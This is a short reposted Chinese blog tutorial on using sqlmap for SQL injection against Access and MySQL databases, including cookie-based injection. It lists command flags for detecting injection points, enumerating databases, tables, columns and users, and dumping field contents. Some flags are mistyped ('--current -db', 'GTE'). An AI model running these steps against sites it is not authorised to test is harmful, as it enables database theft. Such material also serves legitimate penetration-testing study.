您好, 欢迎来到 !    登录 | 注册 | | 设为首页 | 收藏本站

利用sqlmap进行Access和Mysql注入

bubuko 2022/1/25 20:00:12 mysql 字数 1134 阅读 622 来源 http://www.bubuko.com/infolist-5-1.html

sqlmap将检测结果保存到C:\Users\Administrator\.sqlmap\output (windows) linux:(/root/.sqlmap/output) Access注入 1.检测是否存在注入点 2. tables 检测表名 3. columns T “表名”检测那个表中 ...

sqlmap将检测结果保存到C:\Users\Administrator.sqlmap\output (windows)
linux:(/root/.sqlmap/output)

Access注入
1.检测是否存在注入点
2.--tables 检测表名
3.--columns -T “表名”检测那个表中的字段
4.--dump -C "字段名" -T ”表名“ 检测那个表中那个字段中的内容
mysql注入
1.检测是否存在注入点
2.--dbs 当前所有数据库
3.--current -db 当前正在使用的数据库
4.--current -user 检测当前用户
5.--version 检测版本信息
6.--is-dba 检测当前用户是否为数据库管理员
7.以后步骤依照Access注入,-D 指定数据库
Cookie注入
1.检测注入点 --cookie "id=16"--level 2
level 最多5级 risk 最多三级
level 指定探测等级
level 1, 探测GTE,POST
level 2 探测Cookie数据
2.--cookie “id=16”--level 2 --tables 检测表名
3.--cookie “id=16”--level 2 --columns -T "表名“ 检测那个表中的字段名
4.--cookie “id=16”--level 2 --dump -C ”那个字段“ -T "表名“ 检测那个表中那个字段中的内容
【本人不保证技术的实用性,一切文章仅供参考,如有谬错,请留言】

利用sqlmap进行Access和Mysql注入

原文:https://www.cnblogs.com/yiming0403/p/12635246.html


如果您也喜欢它,动动您的小指点个赞吧

除非注明,文章均由 laddyq.com 整理发布,欢迎转载。

转载请注明:
链接:http://laddyq.com
来源:laddyq.com
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


联系我
置顶